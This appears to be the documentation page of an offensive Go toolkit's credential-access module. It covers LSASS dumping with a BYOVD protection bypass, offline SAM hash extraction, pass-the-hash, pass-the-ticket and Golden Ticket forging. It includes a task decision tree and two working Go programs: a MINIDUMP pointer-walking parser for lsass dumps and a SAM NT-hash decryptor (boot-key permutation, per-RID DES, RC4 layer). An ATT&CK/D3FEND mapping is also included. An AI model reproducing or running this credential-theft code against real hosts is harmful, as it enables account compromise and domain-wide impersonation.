Credential access


Pure-Go credential-extraction primitives for Windows: live LSASS process dumping, offline SAM hive parsing, in-process MINIDUMP parsing, and Kerberos ticket forging. The four packages chain end-to-end — lsassdump produces a dump, sekurlsa parses it into typed credentials, goldenticket re-uses an extracted krbtgt hash to mint a Golden TGT, and samdump covers the local-account branch when LSASS access is unavailable.

```mermaid
flowchart LR
    subgraph host [Live Windows host]
        L[lsass.exe<br>memory]
        S[SYSTEM + SAM<br>hives]
        K[krbtgt key<br>on a DC]
    end
    subgraph extract [credentials/*]
        LD[lsassdump<br>NtReadVirtualMemory<br>+ in-process MINIDUMP<br>+ optional PPL bypass]
        SE[sekurlsa<br>parse MINIDUMP<br>walk MSV / Wdigest /<br>Kerberos / DPAPI / TSPkg /<br>CloudAP / LiveSSP / CredMan]
        SD[samdump<br>REGF parser<br>+ syskey / hashed bootkey<br>+ AES/RC4/DES decrypt]
    end
    subgraph forge [credentials/*]
        GT[goldenticket<br>Forge + Submit]
    end
    L --> LD
    LD --> SE
    S --> SD
    K --> SE
    SE -.krbtgt hash.-> GT
    SD --> OUT[NTLM hashes / pwdump]
    SE --> OUT2[NTLM / Kerberos / DPAPI<br>/ CloudAP PRT / etc.]
    GT --> KIRBI[kirbi blob<br>+ LSA cache inject]
```

Packages

| Package | Tech page | Detection | One-liner |
|---|---|---|---|
| `credentials/lsassdump` | lsassdump.md | noisy | NtGetNextProcess + in-process MINIDUMP + EPROCESS PPL unprotect via RTCore64 |
| `credentials/sekurlsa` | sekurlsa.md | quiet (parser only) | Pure-Go MSV1_0 / Wdigest / Kerberos / DPAPI / TSPkg / CloudAP / LiveSSP / CredMan walkers + LSA-crypto unwrap + PTH write-back + Kerberos kirbi export |
| `credentials/samdump` | samdump.md | quiet (offline) / noisy (LiveDump) | Offline SAM hive dump — REGF parser + boot-key permutation + AES/RC4 hashed-bootkey + per-RID DES de-permutation |
| `credentials/goldenticket` | goldenticket.md | noisy (visible TGT lifetime) | PAC marshaling + KRB5 Forge + LSA Submit for Golden Ticket attacks |
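The sekurlsa row above starts from a MINIDUMP. The program below is an added example written for this page, not the project's lsassdump or sekurlsa code: it parses the two structures a credential walker needs first, the MINIDUMP_HEADER with its stream directory and the MINIDUMP_MEMORY64_LIST that maps every captured virtual-address range to a byte offset in the file. `ReadVA` performs that translation, so a pointer read from one range can be followed into another, which is how a walker reaches the credential lists hanging off lsasrv.dll's globals. The dump is constructed in memory with hand-chosen offsets (the signature, 32-byte header, 12-byte directory entries and stream type 9 are the values from minidumpapiset.h). Only full-memory dumps (`MiniDumpWithFullMemory`) carry a Memory64ListStream; on any other dump type every `ReadVA` call fails.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
)

var le = binary.LittleEndian

const (
	Memory64ListStream = 9          // MINIDUMP_STREAM_TYPE value from minidumpapiset.h
	mdmpSignature      = 0x504D444D // "MDMP"
)

type memRange struct{ start, size, off uint64 } // captured VA range -> byte offset in the file
type Minidump struct {
	data   []byte
	ranges []memRange
}

// Parse checks MINIDUMP_HEADER, walks the stream directory and decodes
// MINIDUMP_MEMORY64_LIST, bounds-checking every RVA and size before it is used.
func Parse(data []byte) (*Minidump, error) {
	if len(data) < 32 || le.Uint32(data) != mdmpSignature {
		return nil, errors.New("not a MINIDUMP")
	}
	md, nStreams, dir := &Minidump{data: data}, uint64(le.Uint32(data[8:])), uint64(le.Uint32(data[12:]))
	for i := uint64(0); i < nStreams; i++ {
		e := dir + i*12 // MINIDUMP_DIRECTORY entry: StreamType, DataSize, Rva
		if e+12 > uint64(len(data)) {
			return nil, errors.New("stream directory runs past end of file")
		}
		typ, size, rva := le.Uint32(data[e:]), uint64(le.Uint32(data[e+4:])), uint64(le.Uint32(data[e+8:]))
		if rva+size > uint64(len(data)) {
			return nil, fmt.Errorf("stream %d runs past end of file", typ)
		}
		if typ == Memory64ListStream {
			if err := md.parseMemory64(data[rva : rva+size]); err != nil {
				return nil, err
			}
		}
	}
	return md, nil
}

// MINIDUMP_MEMORY64_LIST: NumberOfMemoryRanges, BaseRva, then {StartOfMemoryRange, DataSize}
// descriptors; the ranges' bytes lie back to back in the file starting at BaseRva.
func (md *Minidump) parseMemory64(b []byte) error {
	if len(b) < 16 || le.Uint64(b) > uint64(len(b)-16)/16 {
		return errors.New("bad Memory64ListStream")
	}
	n, off := le.Uint64(b), le.Uint64(b[8:])
	for i := uint64(0); i < n; i++ {
		d := b[16+i*16:]
		r := memRange{start: le.Uint64(d), size: le.Uint64(d[8:]), off: off}
		if off+r.size < off || off+r.size > uint64(len(md.data)) {
			return errors.New("memory range runs past end of file")
		}
		md.ranges, off = append(md.ranges, r), off+r.size
	}
	return nil
}

// ReadVA returns n bytes at virtual address va, translated through the captured ranges:
// the primitive a credential walker uses to follow pointers out of lsasrv.dll's globals.
func (md *Minidump) ReadVA(va, n uint64) ([]byte, error) {
	for _, r := range md.ranges {
		if va >= r.start && va+n >= va && va+n <= r.start+r.size {
			o := r.off + (va - r.start)
			return md.data[o : o+n], nil
		}
	}
	return nil, fmt.Errorf("va 0x%x (%d bytes) not captured in dump", va, n)
}

// BuildSampleDump assembles a constructed dump (not a real lsass.exe dump) with two
// memory ranges, the first holding a pointer into the second. Offsets are hand-chosen.
func BuildSampleDump() []byte {
	var buf bytes.Buffer
	w := func(v any) { binary.Write(&buf, le, v) }
	// 0x00 MINIDUMP_HEADER: Signature, Version, NumberOfStreams=1, StreamDirectoryRva=0x20, CheckSum, TimeDateStamp, Flags
	w(struct{ Sig, Ver, N, Dir, Sum, Time uint32; Flags uint64 }{mdmpSignature, 0xA793, 1, 0x20, 0, 0, 0})
	// 0x20 MINIDUMP_DIRECTORY: Memory64ListStream, DataSize=48, Rva=0x2C
	w([3]uint32{Memory64ListStream, 48, 0x2C})
	// 0x2C MINIDUMP_MEMORY64_LIST: two ranges, their bytes start at BaseRva=0x5C
	w(struct{ N, Base uint64; R [2][2]uint64 }{2, 0x5C, [2][2]uint64{{0x7FF800001000, 16}, {0x7FF800005000, 8}}})
	// 0x5C range A: 8 filler bytes, then a pointer to range B; 0x6C range B: the 8 pointed-to bytes
	w([2]uint64{0x1122334455667788, 0x7FF800005000}); w([]byte("NTLM-hsh"))
	return buf.Bytes()
}

func main() {
	md, err := Parse(BuildSampleDump())
	if err != nil {
		panic(err)
	}
	p, _ := md.ReadVA(0x7FF800001008, 8) // the pointer stored in range A
	v, _ := md.ReadVA(le.Uint64(p), 8)   // follow it into range B
	fmt.Printf("*0x7ff800001008 = 0x%x -> %q\n", le.Uint64(p), v)
}
```

Every read is bounded by the range descriptor rather than by the file length alone: a pointer that lands in a page the dump did not capture, or a read that straddles two ranges, is reported instead of silently returning bytes from the neighbouring range, which is the failure mode that produces garbage credentials from a partial dump.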

Quick decision tree

| You want to… | Use |
|---|---|
| …get NTLM hashes / Kerberos tickets from a live host | `lsassdump` → `sekurlsa.Parse` chain |
| …parse a `.dmp` you obtained out-of-band | `sekurlsa.Parse` |
| …dump SAM offline (no LSASS access) | `samdump.Dump` |
| …acquire SAM/SYSTEM live (loud) | `samdump.LiveDump` |
| …forge a Golden Ticket | `goldenticket.Forge` → `Submit` |
| …pass-the-hash into a live LSASS | `sekurlsa.Pass` / `PassImpersonate` |
| …pass-the-ticket | `sekurlsa.KerberosTicket.ToKirbi` → `goldenticket.Submit` |
| …bypass PPL on lsass.exe | `lsassdump.Unprotect` + `kernel/driver/rtcore64` |
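The samdump rows above list the de-obfuscation steps behind `samdump.Dump`. The program below is an added example written for this page, not the project's samdump code: it implements the well-documented tail of that chain the way pwdump/creddump-style tools do, namely the boot-key permutation, the per-RID DES key schedule, and the revision-1 RC4 layer keyed from the hashed boot key, so that a stored NT hash field can be recovered. The REGF parsing that locates the account's V record is not shown, and neither is the AES-128-CBC layer that Windows 10 1607 and later use in place of RC4; the per-RID DES step is common to both layouts. The hashed boot key and the stored record are constructed here (the record by running the decrypt path in reverse) so the program runs offline.

```go
package main

import (
	"crypto/des"
	"crypto/md5"
	"crypto/rc4"
	"encoding/binary"
	"fmt"
	"math/bits"
)

// Permutation applied to the 16 bytes gathered from the class names of
// SYSTEM\CurrentControlSet\Control\Lsa\{JD,Skew1,GBG,Data} to obtain the boot key.
var bootKeyPermutation = [16]int{8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7}

func PermuteBootKey(scrambled [16]byte) (key [16]byte) {
	for i, p := range bootKeyPermutation {
		key[i] = scrambled[p]
	}
	return key
}

// strToKey spreads 7 bytes over an 8-byte DES key, then sets odd parity on every byte.
func strToKey(s [7]byte) [8]byte {
	k := [8]byte{
		s[0] >> 1,
		(s[0]&0x01)<<6 | s[1]>>2,
		(s[1]&0x03)<<5 | s[2]>>3,
		(s[2]&0x07)<<4 | s[3]>>4,
		(s[3]&0x0F)<<3 | s[4]>>5,
		(s[4]&0x1F)<<2 | s[5]>>6,
		(s[5]&0x3F)<<1 | s[6]>>7,
		s[6] & 0x7F,
	}
	for i := range k {
		k[i] <<= 1
		if bits.OnesCount8(k[i])%2 == 0 {
			k[i] |= 1
		}
	}
	return k
}

// RIDToDESKeys derives the two per-account DES keys from the RID's little-endian bytes.
func RIDToDESKeys(rid uint32) (k1, k2 [8]byte) {
	var r [4]byte
	binary.LittleEndian.PutUint32(r[:], rid)
	k1 = strToKey([7]byte{r[0], r[1], r[2], r[3], r[0], r[1], r[2]})
	k2 = strToKey([7]byte{r[3], r[0], r[1], r[2], r[3], r[0], r[1]})
	return k1, k2
}

// desRID runs DES-ECB over the two 8-byte halves of a hash, each half with its own RID key.
func desRID(in [16]byte, rid uint32, decrypt bool) (out [16]byte) {
	k1, k2 := RIDToDESKeys(rid)
	for i, k := range [][8]byte{k1, k2} {
		c, _ := des.NewCipher(k[:]) // every 8-byte key is accepted, so err is always nil
		op := c.Encrypt
		if decrypt {
			op = c.Decrypt
		}
		op(out[i*8:i*8+8], in[i*8:i*8+8])
	}
	return out
}

// rc4Layer applies the revision-1 (pre-Windows 10 1607) RC4 layer whose key is
// MD5(hashedBootKey[:16] || RID as uint32 LE || "NTPASSWORD\0"). RC4 is its own inverse.
func rc4Layer(hbk [16]byte, rid uint32, data [16]byte) (out [16]byte) {
	var r [4]byte
	binary.LittleEndian.PutUint32(r[:], rid)
	h := md5.New()
	h.Write(hbk[:])
	h.Write(r[:])
	h.Write([]byte("NTPASSWORD\x00"))
	c, _ := rc4.NewCipher(h.Sum(nil))
	c.XORKeyStream(out[:], data[:])
	return out
}

// DecryptNTHash is the read path: strip the RC4 layer, then undo the per-RID DES step.
func DecryptNTHash(stored [16]byte, rid uint32, hbk [16]byte) [16]byte {
	return desRID(rc4Layer(hbk, rid, stored), rid, true)
}

// EncryptNTHash is the inverse; used here only to construct a sample V-record field.
func EncryptNTHash(nt [16]byte, rid uint32, hbk [16]byte) [16]byte {
	return rc4Layer(hbk, rid, desRID(nt, rid, false))
}

func main() {
	// Constructed inputs: the NT hash of the empty password and a made-up hashed boot key.
	nt := [16]byte{0x31, 0xd6, 0xcf, 0xe0, 0xd1, 0x6a, 0xe9, 0x31, 0xb7, 0x3c, 0x59, 0xd7, 0xe0, 0xc0, 0x89, 0xc0}
	var hbk [16]byte
	for i := range hbk { hbk[i] = byte(i * 17) }
	stored := EncryptNTHash(nt, 500, hbk)
	fmt.Printf("stored:    %x\nrecovered: %x\n", stored, DecryptNTHash(stored, 500, hbk))
}
```

The RID is part of both keys, which is why a record copied between accounts, or parsed with the wrong RID taken from a misread key name, decrypts to random bytes rather than failing loudly; a dumper should sanity-check the recovered hash against the LM/NT length flags in the V record before printing it.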

MITRE ATT&CK

| T-ID | Name | Packages | D3FEND counter |
|---|---|---|---|
| T1003.001 | OS Credential Dumping: LSASS Memory | `credentials/lsassdump`, `credentials/sekurlsa` | D3-PSA, D3-SICA |
| T1003.002 | OS Credential Dumping: SAM | `credentials/samdump` | D3-PSA, D3-FCA |
| T1068 | Exploitation for Privilege Escalation | `credentials/lsassdump` (PPL bypass via BYOVD) | D3-SICA |
| T1550.002 | Use Alternate Authentication Material: Pass the Hash | `credentials/sekurlsa` | D3-PSA, D3-SICA |
| T1550.003 | Use Alternate Authentication Material: Pass the Ticket | `credentials/sekurlsa`, `credentials/goldenticket` | D3-NTA |
| T1558.001 | Steal or Forge Kerberos Tickets: Golden Ticket | `credentials/goldenticket` | D3-AZET, D3-NTA |
| T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | `credentials/sekurlsa` (downstream consumer) | D3-NTA |

See also